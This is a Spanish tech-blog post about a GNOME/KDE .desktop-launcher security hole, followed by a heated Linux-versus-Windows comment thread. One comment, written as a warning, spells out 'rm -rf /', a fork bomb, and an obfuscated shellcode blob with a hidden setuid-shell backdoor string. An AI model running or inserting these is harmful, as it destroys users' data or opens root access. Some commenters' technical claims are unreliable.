Un artículo con el mismo titular que esta noticia está dando mucho que hablar estos días en Internet. Si bien existen rumores falsos sobre que Linux está libre de virus, aunque es cierto que es menos propenso a ellos, en la nota original ofrecen una pequeña guía para crear un archivo/malware para el sistema operativo libre, que permitirá en cosa de 2 minutos tener un archivo malware creado.
Para ello Foobar en GeekZone han creado una guía utilizando archivos .desktop con la que se puede ejecutar software sin pedir ningún tipo de permiso. El problema en sí lleva años y se resume en que tanto Gnome como KDE interpretan directamente los archivos .desktop siguiendo su extensión y no haciendo uso del típico bit de ejecución +x de los archivos en Linux.
Dicho comportamiento supone una violación de los principios Unix en los que un archivo solamente es ejecutable cuando tiene el bit +x activado. La característica de ejecutable se analiza según el nombre de archivo, tal y como en Windows pasa con los *.exe, *.com, etcétera. El problema afecta a los archivos .desktop (iconos de escritorio) y si queréis, podéis seguir la guía de 5 pasos para crear un archivo .desktop que ejecute cualquier acción de un script en Python o Perl.
Simplemente me rió. Cuanto te han dado microsoft para que pongas esto becario.
Ahora si DIGAN:
“Usen linux”
y muerdan polvo
No es técnicamente un virus. Sí es un agujero de seguridad, explotable por el enlace más débil que existe: el usuario.
linux nunca ha sido inmune a los virus, solo que hay demaciado pocos para el, y si entra uno hace demaciado poco
lo bueno es que casi nadie baja archivos y menos ejecutables de un lugar poco conocido o que no sea una replica oficial
JO JO JO JO JO!!!
haber quien es el guapo que me encuentra en cualquier sitio de la red un usuario linux pidiendo ayuda por estar “infectado” tal y como es habitual en los usuarios windows…
Pero, primero debes obtener el malware, y este debe modificar un lanzador, y luego queda la cuestión de los privilegios.
Es un flanco de ataque demasiado acotado, tan factible como bajarnos el código del virus, compilarlo y correrlo como root.
Por cierto, esto tiene como 2 semanas, ya lo lei en kript_opolis(palabra prohibida), y antes en otra web.
Los agujeros están ahí. Que no se aprovechen solo quiere decir que nadie tiene interes en hacerlo.
Cuando Firefox (por aquel entonces del que hablo se llamaba Phoenix) lo usábamos cuatro monos, también nos sonaba a chino que alguien siquiera se planteara crear una extensión maliciosa para él. Y eso, a día de hoy, ya ha ocurrido.
Pues ya sería hora de que alguien lo parcheara. Ojo y lo digo desde la óptica de un programador pro-linux. GNU/Linux es mejor que otros sistemas en cuanto a seguridad, que alguien lo arregle o la imagen de GNU/Linux quedará en entredicho para los usuarios de a pié, y como siempre, se quedará en un sistema para que lo usemos los que tenemos un mínimo de conocimiento. Si GNU/Linux quiere llegar al público no se pueden permitir estos fallos de “imagen”. Otra cosa es que quiera llegar o no hasta ahi.
usen mac os…basta de idioteces
Como dice Pepote busquemos en la red quien esta sufriendo de este mal… pero si quieren buscamos sobre confiker
También podemos buscar en la red quien está usando Windows y quien está usando Linux.
Mejor aún, seguro que no hay absolutamente nadie usando Haiku que haya tenido un solo problema de seguridad. Ni uno solo.
Ergo, afirmo con convicción, que Haiku es el sistema operativo más seguro de la historia.
@pinkfloyd a ver si puedes afirmar cuantos servidores corren gnu linux y que “tantos jaja” corren wirux de mierdonnsoft, y como la bolsa de ny funciona de maravillas y la de londres ha arrastrado a toda europa, la idea no es atacar a usuarios de apie si no a servidores donde se necesita realmente la alta disponibildad y alta seguridad.
Habían tardado mucho en aparecer los servidores.
¿Alguien quiere hablar de lavavajillas o de microondas?
nu se … mi router ( que lleva lunix en sus tripitas .. que cosas ) sigue funcionando perfectamente aun habiendo peligrosisimos virus como el descrito…
por cierto.. quien usa Gnome, lxde, XFce, fluxbox , E17 o cualquier otro escritorio que no sea KDE ¿¿¿ tambien se pondrá malito ????
@pinkfloyd
si, alguien quiere hablar, tu dolor a que no se tome en serio a mierdonsofft para los negocios serios jeje.
@pepote no será pq no hay usuarios de nivel bajo que usen linux? ¬¬
A ver donde encuentras un usuario avanzado pidiendo ayuda por haberse infectado con windows….
@Yo en los servers que no tienen usuarios haciendo doble click tienen a cornfliker, el los servers con linux no :)
y esos usuarios de windows que manejan servers si que son avanzados!! jaja
@pinkfloyd
lo coloco de ejemplo por que ha sido lo mas sonado de ambas partes, ahora que pena con los usuarios windows
Sale otro ahora con un router
jajaa
Si es que los linuxeros sois cachondisimos. ¿por que no os meteis a politicos? Se os da de perlas cambiar de tema y echar balones fuera.
@pinkfloyd llegas tarde, tenemos a políticos en ese ámbito o no ves todas las noticias sobre gnu linux y el open source implantandose noche y día en las instituciones gubernamentales en detrimento de mierdonsoftt y sus pobres productos?
@barton
Este vector de ataque solo afectaría a Gnome y KDE.
Pero insisto, primero se debe modificar un lanzador y grabar el binario en una parte accesible del home.
Y aún con esto queda la elevación de privilegios.
Es algo muy rebuscado para que funcione, igual espero que lo corrijan pronto.
Hay que destacar que para Linux no te sueles bajar, por lo menos yo, ningun “programa sospechoso”. Es decir ya sea un archivados, un deb, un rpm o un simple sh. Muchos usuarios de linux seguro que no conocen ni la mitad de estos, pero normalmente el usuario instala desde los repositorios o agrega repositorios extraoficiales como los de launpach.
En todo caso, programa script y kron para Linux, y la cosa no es tan facil como la pintan, hay que saber programación para hacer algo que realmente afecte al sistema y aun asi siempre queda la seguridad de privilegios de Linux muy dificil de saltar a la torera.
Puf es muy pero que muy rebuscado. Casi nadie que use GNU/Linux tiene siquiera bajado un antivirus.
apple fan: eres más propenso a tener un virus en Mac que en GNU/Linux, mucho más, y no te olvides que acaban de sacar un parche con la solución a un problema ¡conocido desde hace 6 meses! Por Dios, que celeridad, casi más lento que Micro$oft. :p :p
Vamos a ver, una persona puede hacer con su ordenador lo que quiera.
Siempre se le podrá engañar para que borre del mismo archivos esenciales y se estropee. Si a esto le llamais virus…
Que me lo compareis con los worms que infectan XP como aquel virus que se te instalaba por red antes de haber incluso acabado de instalar Windows es como comparar a Cristiano Ronaldo o Messi con mi vecino que juega en regional preferente.
Haber ningún S.o es perfecto pero lo mas cercano sin duda es gnu/linux.
señor floyd.. mientras que una supuesto router , que no tiene porque ser un dispositivo autonomo y puede ser perfectamente un ordenador corriente y moliente que hace de puente entre internet y una red LAN y cuyo cometido es enrutar las peticiones entrantes/salientes de ambas redes , gobernado por windows sufriria todos y cada uno de los problemas de seguidad que suele sufrir windows ( virus, gusanos, malware en general ) ,en un router linux ( como por ejemplo, el que hay que entra en un disquete ) el ” gran problema” del que estamos hablando le resbalaria completamente…
como comenta magtec ( que no ha captado la 2º intención de la pregunta ;) ) , solo los sismemas corriendo KDE o Gnome podrian sufrir el problema de seguiridad del que estamos hablando y otros escritorios y entornos de ventanas ( como Lxde , Xfce , fluxbox , E17 ) serian inmunes a tan “refinado” ataque…
ningun sistema es inmune a los virus/malware .. la diferencia es lo facil que es contaminarte y el daño que se puede probocar por este hecho…
han intentado ejecutar un .py sin permiso de ejecucion con gnome? suele abrirse gedit hahaha
MIENTEN!!! LINUX ES LO MEJOR QUE EXISTE, y no consume tanta energia en las piezas como buindows
Cómo escribir un virus para windows en sencillos 5 segundos.
Para Jesus Maturana que publico este post. realamente sabes poco de sistemas operativos que soportan el estandar POSIX.
1ero los archivos .desktop son archivos de texto plano que lo soportan algunos window manager como xfce4 o los escritorios kde o gnome entre otros.
Los .desktop son simples lanzadores de programas que entre sus parametros esta el binario o script a ejecutar.
Cuando se ejecuta el programa siempre se verifica sus permisos y por lo tanto esto lo que dices
“El problema en sí lleva años y se resume en que tanto Gnome como KDE interpretan directamente los archivos .desktop siguiendo su extensión y no haciendo uso del típico bit de ejecución +x de los archivos en Linux.”
ES FALSO.
Existe diferentes niveles de seguridad desde la capa del usuario hasta el kernel para la ejecucion de procesos.
Los archivos .desktop solo lo soporta un grupo de windows manager y otros escritorios , ademas es algo que no esta estandarizado ya que hay algunas diferencias entre uno y otros.
Hay otros que no usan el .desktop ya que tienen sus propios lanzadores de programas que siempre todo programa antes de convertirse en proceso se verifica sus permisos.
2do.- La ejecucion de un proceso, solo afecta al entorno del usuario , si existe un proceso malicioso no puede causar mas dan-o hasta donde los permisos que se dan al usuario lo permitan.
Ejecutar procesos no seguros como root trae mucho riesgo, pero como generalmente se logean como simples usuarios el dan-o es menor y controlable.
3ero En todo el tiempo que llevo usando linux y son muchos an-os , solo una vez me intereso el tema de los virus sobre todo e su programacion y como puede evadir los niveles de seguridad de un S.O que soportan POSIX y mi opinion al respecto es que los virus para UNIX no se pueden comparar a los que existen para windows en ningun sentido, es complicado que cualquier virus para UNIX pueda causar un gran dan-o.
el problema esta al ejecutarlos como root pero aun asi es controlable , claro depende del que esta al frente de la pc que tenga los conocimientos para darle solucion.
4to Busque y olo encontre 1 virus para linux en todos estos an-os escrito en C y lo unico que asi era copiar archivos una y otra vez al sistema de ficheros donde tenia permiso para ejecucion y escritura y cuando no podia copiar o duplicar los archivos el kernel enviaba mensajes al log del sistema indicando que este proceso no tenia permisos de escritura, lo cual era facilmente rastreable y se podia localizar el proceso para luego eliminarlo.
Solución fácil: init 3
Las X son para débiles…
Esto se ha tratado ya NUMEROSAS veecs y siempre se llega a lo msimo es tonteria crear un virus para linux precisamente opr el tema de los privilegios (lo cual no quita que Gnome y KDE deberian de arreglar estos BUGS)
De todas maneras es que es MUCHO mas sencillo que todo esto, si quieres putear a alguien solo has de crear un script para instalar algo que busque la gente y en medio de todo metes el comando “rm -rf / ” y adios muy buenas, sin nisiquiera pedirte confirmacion va a borrar el directorio raiz del sistema… (y no , no es un BUG, es un comando muy potente del shell), o le metes el comando “:(){:|:&};:” y toma forkbomb, sistema congelado…
Pero volvemos a lo mismo, para que algo asi funcione tienes que conseguir:
1. Que la victima lo descargue, no hay manera de meterlo directamente via msn,outlook,explorer…
2. Que la victima lo ejecute con permisos de administrador (que ya hayq ue ser torpe para ejecutar como root algo que no sabes ni que es…)
Por cierto, os aconsejo que no ejecuteis cualquier script que veais por ahi, si quereis hacer algo buscad informacion y hacedlo vosotros en lugar de via script, ya que en los script se puede ocultar estos comandos incluso con otros lenguajes, por ejemplo:
—————————————————————————-
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
—————————————————————————
Eso no es mas que el comando rm -rf / escrito en hexadecimal e igualmente ejecutable…
señor floyd.. mientras que una supuesto router , que no tiene porque ser un dispositivo autonomo y puede ser perfectamente un ordenador corriente y moliente que hace de puente entre internet y una red LAN y cuyo cometido es enrutar las peticiones entrantes/salientes de ambas redes , gobernado por windows sufriria todos y cada uno de los problemas de seguidad que suele sufrir windows ( virus, gusanos, malware en general )
Que tonterías dice usted, señor barton.
Si usted hubiera leído algún libro de seguridad informática en su vida en lugar de panfletos en internet, sabrá que lo que afirma es una estupidez.
Le reto a citarme un sólo libro técnico ( no me vale una guia de usuarios de bolsillo para ubuntu, obviamente ) en el que se afirme y se justifique una superioridad técnica desde el punto de vista de la seguridad de un sistema unix/linux sobre un Windows NT.
Ustedes sólo saben regurgitar mitos y leyendas.
pinkfloyd ¿Puede ser uno que no sea escrito por Micro$oft? xD
Seamos serios, NT ni tiene la estabilidad, ni la seguridad de un servidor basado en GNU/LInux, y si quieres extenderlo al sector servicios, Red Hat Enterprises se come con patatas a Micro$oft, incluso Novell hasta hace no mucho tiempo (ahora mismo no estoy al día en el tema). ;)
A mi antiguo profe de redes le daba asco tener que trabajar con NT, pero era su trabajo, él prefería Unix y consola, consola, consola. ;)
Pynkfloid personalmente pienso que los fanatismos (por ambos lados) nunca son buenos, pero menos aun la demagogia….
Acaso no esta SOBRADAMENTE demostrado que los sistemas UNIX son mas seguros que windows?
Necesitas un libro, eso si que no sea una guia de usuarios de UNIX… acaso existe algo asi?
Si te sirve de algo libros no, pero te puedo dejar estas declaraciones del maestro Andrew Kutz (Entre sus titulaciones, Kurtz es Microsoft Certified Solutions Developer (MCSD) y Certified Windows Security Administrator (GCWN) por SANS/GIAC)
—————————————————–
Lo cierto es que manejo tanto servidores Windows como Linux y tengo que instalar muchos más parches en los servidores Windows que en sus hermanos Linux. Tal y como “sale de la caja”, Linux da una paliza a Windows en lo que se refiere a seguridad preconfigurada.
Eso no equivale a decir que Windows no puede ser hecho seguro. De hecho, un servidor Windows bien configurado es mucho más fácil de manejar (en mi opinión personal) que un servidor Linux, pero eso no anula el hecho de que si se instala un servidor con Windows y el de al lado con Linux, se ponen ambos en la red y se abandona la habitación, el servidor Windows va a ser el que resulte secuestrado.
—————————————————–
Las chorradas que hay que oir de algunos. No creo que nadie fan de linux haya dicho nunca que Linux no tiene virus… claro que tiene…. pero es que de cada posibilidad de crear un virus en Linux, existen 5000 posibilidades en Windows.
Seamos serios, NT ni tiene la estabilidad, ni la seguridad de un servidor basado en GNU/LInux, y si quieres extenderlo al sector servicios, Red Hat Enterprises se come con patatas a Micro$oft, incluso Novell hasta hace no mucho tiempo (ahora mismo no estoy al día en el tema). ;)
¿Por que tú lo dices?
Acaso no esta SOBRADAMENTE demostrado que los sistemas UNIX son mas seguros que windows?
No. Está sobradamente dicho, que es muy distinto.
Y si leyérais alguno de esos libros a los que me refiero, sabríais que el malware ni nació con Windows, ni morirá con Windows, con ejemplos hasta para aburriros.
Pero claro, ahora que el 90% de ordenadores conectados usa Windows, nadie se acuerda del gusano de Morris:
http://en.wikipedia.org/wiki/Morris_worm
autor, deja de flamear con este tipo de ‘publicaciones’. muy informal eso de: entra aqui si quieres crearte tu archivo malware.
Pues a mi el thunar chico que no se traga los *.desktop bajados de Internet. Y no se porque discuten sobre Linux, cuando el tema va sobre Gnome y Kde que ellos son los que tienen esta laguna, no Linux, es decir si pones Gnome o KDE a un Solaris, un BSD, o el que quieres le va a pasar porque es un tema del entorno de escritorio, con eso uno ya puede hacerse una idea del potencial de este ataque, que más que virus sería malware, por necesitar intervención del usuario.
@krl301
No lo habría explicado mejor que tú. Es decir, no sólo tienes que bajar el archivo que ya de por sí es oculo (.desktop), sino además situarlo en el directorio correcto (~/.config/autostart). Por no mencionar de que sólo afectaría al usuario en cuestrión siempre que el script con malware al que se llama tenga permiso +x.
Además, Linux tiene más importancia en servidores, donde rara vez se utiliza entorno de escritorio.
Maturana…tio….como has revuelto el gallinero. Por una vez que postea algo malo de linux y hos tirais al cuello, sois una panda de lloronas.
“La ejecucion de un proceso, solo afecta al entorno del usuario”
Si, en todos los sistemas los usuarios limitados no pueden afectar al resto del equipo, esto es cierto.
Pero, ¿de que te sirve que el resto de usuarios esten limpios si el tuyo no?, ¿te da igual que se carguen unos troyanos al inicio de tu usuario y envien tus datos, o borren tus documentos?…
jeje, al pinkfloyd este no le gustan ni que hablen de servidores o routers pero saca a relucir un gusano de los 80 que si que no tiene nada que ver xD En fin, cada loco con su tema que se dice, no? ;)
krl301 y Messi lo han expuesto muy bien; y lo dicho por todos: nadie dice que no pueda haber malware para gnu/linux, sólo que para que afecte realmente casi debería ser el propio usuario el que lo ejectutara y le dira permisos, lo cual es ciertamente poco probable… aunque siempre hay masocas por ahi a los que les gusta el dolor jeje Y aún así es muuy difícil que comprometiera el sistema (como con Windows, vamos).
Me remito a una noticia reciente sobre un análisis completo del nucleo de Linux.
La fuente es la siguiente, aunque cito aquí dos parrafos significativos:
http://www.neoteo.com/el-kernel-de-linux-arrasa-en-seguridad-14325.neo
“El kernel analizado ha sido exactamente el 2.6, versión que utilizan la mayoría de distribuciones Linux. El estudio asegura que sólo se han detectado 985 errores(bug) en toda la secuencia de 5.7 millones de lineas de código, dato que arroja una media de 0.17 fallos por cada 1000 lineas de código. Este resultado pulveriza los datos medios de un programa comercial que se sitúa en los 20 o 30 errores por cada 1000 líneas de código, según atestigüa la Universidad de Carnegie Mellon. Si un programa comercial tuviese las mismas líneas de código que el kernel de Linux la tasa de errores se dispararía entre los 114.000 y los 171.000 errores. Inadmisible. ”
“De los 985 errores detectados, 627 se encontraban en las partes críticas del núcleo. Se encontraron 569 bug que podrían causar inestabilidad o caídas del sistema, 100 fueron agujeros de seguridad, y 33 de los errores podría dar lugar a bajadas del rendimiento. Set Hallem, director ejecutivo de Coverity, empresa que proporcionó el software para las pruebas, declaró que la comunidad Linux ya había resuelto la mayoría de los fallos encontrados en el estudio. “Nuestros hallazgos muestran que Linux contiene una muy baja tasa de errores y es la prueba de la enorme seguridad que posee Linux”"
Cito:
“El problema en sí lleva años y se resume en que tanto Gnome como KDE interpretan directamente los archivos .desktop siguiendo su extensión y no haciendo uso del típico bit de ejecución +x de los archivos en Linux.”
En KDE y Gnome un script puede ejecutarse aunque no sea ejecutable, pero tiene restricciones al espacio del usuario. Un virus, para ser tal, debe ganar el espacio del Kernel.
Por otro lado, se trata de una caracterisitca que puede deshabilitarse.
Cito:
“La característica de ejecutable se analiza según el nombre de archivo, tal y como en Windows pasa con los *.exe, *.com, etcétera.”
Todos saben que esta caracteristica supone un problema en Windows, pero, por lo antedicho es evidente que tal conjetura no es homologable en Linux, tenga o KDE o Gnome.
Obviamente lo único que a TheInquirer le interesa es colgar un título como este sin tener en cuenta cuan verosimil resulta.
Dejen de desinformar por favor.
Esa notícia me recuerda y me suena al famosísimo VIRUS GALLEGO
Pinkfloyd es gallego
el titulo de la noticia seria mejor asi:
“Como escribir una noticia cojuda en 5 pasos”
De todos modos hay que terner en cuenta que la mayoria de la gente que se infecta con virus son usuarios con poca experiencia. Por eso tambien es windows el mas infectado.
Son casos raros, pero no veo yo usuarios sin idea de ni siquiera de lo que es un firewall usando un equipo que no lleve a microsoft en las tripas.
linux es para retrasados que no tienen otra cosa que hacer. ¿A quien le importa que existan virus en linux si nadie lo usa?
jeje, al pinkfloyd este no le gustan ni que hablen de servidores o routers pero saca a relucir un gusano de los 80 que si que no tiene nada que ver xD En fin, cada loco con su tema que se dice, no? ;)
Te saco un gusano de los 80 para que veas que el malware no surgió con Windows.
Ni ese gusano surgió con Windows, ni los troyanos nacieron con Windows, ni los rootkits nacieron con Windows.
Pero como los linuxeros son una panda de fanboys parecidos más a hinchas de equipo de fútbol que otra cosa, gritemos todos a una: “esto en unix no pasa“
en resumidas cuentas…, alguien ha encontrado en cualquier sitio de la red a un user linux que pida ayuda por estar infectado si o no???
#pinkfloyd
Tienes razon, el malware no nacio con windows, pero como bien ha dicho alavezz, la evolucion de windows (desde ms-dos, ya que windows 1.0 se basaba en su kernel) desde 1985, comparada con la evolucion de linux que esta desde 1991, es abismal.
No puedo creer que un sistema que tiene 6 años mas de desarrollo, este por detras en seguridad…
Al principio era unix quien tenia la mayoria de malware, etc, pero dime.
Cual es el SO mas propenso a sufrir de este tipo de problemas ahora?
A modo de estadistica dire que he usado windows y linux en un dual boot y el resultado es este:
Reinstalaciones de linux: 0
Reinstalaciones de windows: he perdido la cuenta…
pinkfloyd volvemos a lo de antes puedes meter a Linux donde quieras, pero el problema no es de Linux es del entorno de escritorio Gnome y KDE, que permite la ejecución de archivos, *.dektop bajados de internet sin validación del usuario, con que en la cuenta del usuario pueden hacer un desbarajuste tremendo, pudiendo llegar a borrarla si le echas imaginación, para más cosas tendrás que utilizar la ingeniería social, pero por el motivo de la infección no es un virus, es malware necesita intervención del usuario, y una serie de condiciones Gnome o KDE, que lo considero un falló de estos dos escritorios pues sí, y si leyeras el articulo original, tendrías una información muy amplia, y esto cambiando un simple parámetro se evita, solo hay que hacerlo por defecto, y este malware se acabo. Si es la repera este malware.
Por ejemplo, yo que uso GNU, uso el entorno de XFCE y estos cinco pasos no valen para nada porque mi gestor de archivos no ejecuta los *.desktop bajados de Internet, ya lo he intentado y no el amigo dice que no, y eso que el usa los *.desktop como lanzadores en el escritorio.
Y si los rootkits nacieron donde nacieron porque son son un conjunto de herramientas que ya existían en Unix, y que todo se ha dicho son muy útiles, modificandolas muy poco y algutinandolas, se consiguieron potentes herramientas para saltarse el sistema, y una manera de conseguir entrar en un Unix.
Si te crees que tu sistema es perfecto, esta lejos de la realidad, pero en cuanto seguridad, nadie esta a salvo pero las comparaciones son odiosas.
Sois unos cansinos con el tema linux / windows. Ahora mismo quito el feed de este bodrio de blog.
Saludos y a seguir mareando la perdiz.
El peor virus esta entre el teclado y la silla. Y es un problema que ningun SO puede remediar. La forma mas peligrosa de virus es el Troyan Horse acompañado de ingenieria social.
Si el root quiere cargarse el sistema nadie se lo impedira y la falsa sensacion seguridad de linux provoca que suceda mas de lo deseable
continuo esperando…
@pepote
Espera todo lo que quieras. Es obvio que nadie se va a mojar por sus ideales. Los que sabemos que Linux es infinitamente más seguro, lo sabemos porque estamos ahí, y los Winfans tienen un titular de noticia c0jonudo para aferrarse a él.
La prueba de fuego puede ser instalar un XP SP1 y un Suse 8.2, sin antivirus los 2 y navegar durante una hora por páginas normales y corrientes (o sin navegar).
A ver que pasa…
“”Cuando el diablo no tiene que hacer….con el rabo espanta moscas”"”" lo que hay que leer.
por favor como si alguien pudiera infectarse!!!! xDDDDDDD en linux tenemos repositorios, nosotros no descargamos software googleando. ajajjajajjajajajjaj como si alguien fuera tan tonto xD
No puedo creer que un sistema que tiene 6 años mas de desarrollo, este por detras en seguridad…
Bueno, eso es porque para empezar estás contando desde el momento que te da la gana. Windows hoy día no tiene nada que ver con DOS, y la primera versión de NT es del 93, así que si acaso, NT es más moderno que Linux.
Al principio era unix quien tenia la mayoria de malware, etc, pero dime.
Cual es el SO mas propenso a sufrir de este tipo de problemas ahora?
El que es usado. Te vuelvo a repetir: Haiku tiene aún menos problemas de seguridad que Linux, pero vamos, con total certeza. ¿Afirmarias que Haiku es un SO más seguro que Linux? Yo no me atrevería, porque es una falacia lógica.
el problema no es de Linux es del entorno de escritorio Gnome y KDE, que permite la ejecución de archivos, *.dektop bajados de internet sin validación del usuario
Es posible que el kernel sea muy seguro, pero el kernel por sí solo no vale para nada. Descartar el problema como “no es un problema en Linux” es echar balones fuera, aunque sólo sea porque la inmensa mayoría de usuarios de ESCRITORIO utilizan uno de los dos escritorios, y desde luego, un sistema con muchísimos más componentes instalados y en ejecución que el kernel pelado.
Si te crees que tu sistema es perfecto, esta lejos de la realidad
No, yo no creo eso, pero tampoco lo creo de Linux. Un sistema operativo que oscila entre 1% y 3% del total de usuarios no se ha puesto a prueba en el mundo real, como no se ha puesto a prueba Haiku ni ningún sistema minoritario, os guste o no os guste que esto sea así.
Alucino contigo chaval, yo no cuento desde donde me da la gana, sino desde que aparecio la primera version de windows.
Llevo 18 años en el mundo de la informática, administrando windows y linux, y usuarios cazurros (trolls) como tu los he visto a patadas…
Realmente es lamentable leer tanta tonteria junta. Que si tal, que si cual. Pareceis politicos dios mio. Hay que ser un poco lerdo y corto de miras para no darse cuenta de cual es la realidad de todo este asunto. Que ya le gustaria a MS tener un nucleo tan solido como el de Linux. Y no hay mas. Lo demas son comentarios de gente a la que se le inicia el messenger automaticamente al arrancar su windows. por diosss
Alucino contigo chaval, yo no cuento desde donde me da la gana, sino desde que aparecio la primera version de windows.
Llevo 18 años en el mundo de la informática, administrando windows y linux, y usuarios cazurros (trolls) como tu los he visto a patadas…
Pues es curioso que no sepas que en lo único que se parece Windows hoy día a Windows 1.0 es en el nombre.
Y no te preocupes, que yo fanáticos tarados alardeando de conocimiento también he visto muchos.
Realmente es lamentable leer tanta tonteria junta. Que si tal, que si cual. Pareceis politicos dios mio. Hay que ser un poco lerdo y corto de miras para no darse cuenta de cual es la realidad de todo este asunto. Que ya le gustaria a MS tener un nucleo tan solido como el de Linux. Y no hay mas. Lo demas son comentarios de gente a la que se le inicia el messenger automaticamente al arrancar su windows. por diosss
La fe hay que dejarla en las iglesias y en las sinagogas, que ahí está muy bien.
x maese
no hace falta que me lo jures, hace años que espero que alguien me dé alguna razón de ello y lo único que veo son flameos constantes y falta de argumentaciónes XD
ahora a por otro…:
x pinkfloyd
de donde sacas esos porcentajes de usuarios???, del departamento FUD de microsoft???… XD
si no hay nadie que sepa cuantos usuarios existen.., yo te digo que mas de 50 millones, demuestrame que no es así anda XD,
esa guia esta muy larga, en linux se puede escribir malware con una linea de codigo, la ventaja es que no hay tantos ojetes como los hay en Windows… que ventaja!!
Nota Mental: Consultar hardering.
@ pinkfloyd
Ya que parece que deseas que alguien te explique porqué Linux es superior a Windows en cuanto a seguridad, y con argumentos técnicos, te lo voy a explicar:
Solo te voy a poner un ejemplo para que no te canses, una de las formas que tiene un virus de atacar es infectando la memoria de varios procesos y esta es una forma de infección que no afecta a Linux de ningún modo, ya que por su propia estructura, ningún proceso, ni siquiera aquellos que tienen los máximos privilegios, pueden tener acceso a la memoria de otros.
No creo que haya que explicarte que esto en Windows sucede y es posible, por lo que de momento, ya tienes aquí una forma de infección a la que Linux es invulnerable.
Hay otra forma de infección por parte de los virus, pero es que ésta, aún afectando a root, suele ser facilmente controlable como ha explicado bien krl301.
Podemos hablar de Rootkits y del malware que desees, de aquellos rootkits que supuestamente afectaban a las máquinas huésped en sistemas virtualizados Linux, ¿Donde están?.
Mira, no te canses, reconozco que desde un punto de vista técnico es dificil defender Windows, pero es que algunos os situáis en el esperpento informático.
Veo que seguimos con la misma discusion… me hace MUCHA gracia ver como pinkfloyd se va saltando los comentarios que no le interesa contestar (porque claro desmontaria toda su historia evidentemente)
Te sigues basando en que como windows es el mas usado es el que mas fallos tiene… y NO, esa es uno de los FUD mas grandiosos de la comunidad windowsera… la seguridad no depende del numero de usuarios sino de como este montado el sistema…
Que en linux hay fallos? Pues claro, como en todas partes, la diferencia es que el 99% de los fallos se han solucionado antes de que siquiera trascienda el error, amen de que por mas que tu no quieras verlo linux es hoy por hoy el sistema operativo domestico mas seguro (todos los años lo demuestran todas esas compañias que hacen concursos para hackear servidores con windows, mac/os y linux y linus siempre cae el ultimo… si es que cae)
Y nuevamente te repito, este fallo NO es de linux, es un fallo de Gnome y KDE (por si no lo sabes son multiplataforma…) y no me vale la excusa barata de “casi todos usan eso” porque por esas mismas es como si yo dijese hay un bug en winamp y como casi todo el mundo lo usa… pues windows no es seguro… seria logico?
lo más ironico que el fallo fue por que “asimiló” esa “prestacion” de explorer…
Es ridículo mencionar que existen virus para Linux, pero suena lógico mencionar que existe una vulnerabilidad…
q decían de q en linux los bugs y fallos de seguridad se arreglan rápido?
me pareció leer q llevan AÑOS con este fallo de seguridad?
@marta
Tú te bajas de internet y ejecutas archivos .reg o .pif???
@pinkfloyd
Eres mi héroe personal. El único con dos dedos de frente. Capaz de desarrollar un discurso lógico en medio de una lluvia de tópicos (falsos, como casi todos) que son el verdadero virus de Linux.
Un año usando Ubuntu y he terminado harto, no tanto del sistema como de tener que aguantar a sus fans en cada esquina de la red. Son estos zombis semianalfabetos sin pizca de autocrítica los que impiden que Linux avance y se convierta en una alternativa real.
Solo te voy a poner un ejemplo para que no te canses, una de las formas que tiene un virus de atacar es infectando la memoria de varios procesos y esta es una forma de infección que no afecta a Linux de ningún modo, ya que por su propia estructura, ningún proceso, ni siquiera aquellos que tienen los máximos privilegios, pueden tener acceso a la memoria de otros.
Tú no has oído hablar de un buffer overflow en tu puñetera vida, ¿verdad?
Pues claro, como en todas partes, la diferencia es que el 99% de los fallos se han solucionado antes de que siquiera trascienda el error, amen de que por mas que tu no quieras verlo linux es hoy por hoy el sistema operativo domestico mas seguro
Haiku es mil veces más seguro que Linux, usando tu falacia lógica.
Y nuevamente te repito, este fallo NO es de linux, es un fallo de Gnome y KDE (por si no lo sabes son multiplataforma…) y no me vale la excusa barata de “casi todos usan eso” porque por esas mismas es como si yo dijese hay un bug en winamp y como casi todo el mundo lo usa… pues windows no es seguro… seria logico?
Claro, claro. Por eso cuando el 99% de problemas de seguridad de Windows venían de Outlook Express y de IE, todos disculpábais a Windows diciendo que eso “no era un fallo de Windows”. ¿Verdad que sí?
Ah, por cierto, ese rollo barato que sueltas en el primer párrafo se llama memoria protegida, y es un requisito absoluto de cualquier SO moderno. TODOS lo tienen; NT, Linux, Solaris, los BSD, OS X…
qué facil es demostrarle a un linuxero fanático que no tiene ni puñetera idea de lo que dice.
¿Windows Server es más seguro que las versiones de escritorio porque lo usa menos gente?
Que gran argumento!
…, vamos a ver…., insisto…., algún ejemplo en cualquier sitio de la red de usuario linux que pida ayuda por estar infectado????
Claro, claro. Por eso cuando el 99% de problemas de seguridad de Windows venían de Outlook Express y de IE, todos disculpábais a Windows diciendo que eso “no era un fallo de Windows”. ¿Verdad que sí?
a diferencia de winamp , que si se puede desistalar, Idestroyer viene incrustado en windows y es parte del sistema por lo que cualquier bug en este es achacable a windows…
si me dices las office, que si son desistalables, pues ya es otro cantar…
Faltaría más. No como Gnome y KDE, que no son parte del sistema y se pueden desinstalar.
Si es que después de todo, a tu abuelita a la que le instalaste esa ubuntu para contribuir al año de Linux le encanta la línea de comandos, y ya es toda una experta en sed y awk.
Ahora es cuando siguiendo la línea de desvaríos linuxera habitual, alguien me dice que su abuelita está usando twm, y tan contenta.
@pinkfloyd
Un buffer overflow es un agujero de seguridad y nada tiene que ver con la estructura inicial del sistema y por cierto, no ha habido ningún caso de virus que replicándose hayan afectado a la memoria de los diferentes procesos, algo que en Windows sucede a menudo.
Tú has pedido un ejemplo en el que se demuestre que la estructura de Linux le haga superior a Windows en cuanto a seguridad y te lo he dado,
“Otros sistemas” como tú dices, generan una cantidad muy elevada de llamadas que no se encuentran documentadas, al anillo 0, y esto les hace vulnerables, en una de estas llamadas es dónde se desarrolla la infección y esto como te he escrito, esto no se produce en Linux.
Por cierto, a esto se le denomina arquitectura de memoria virtual.
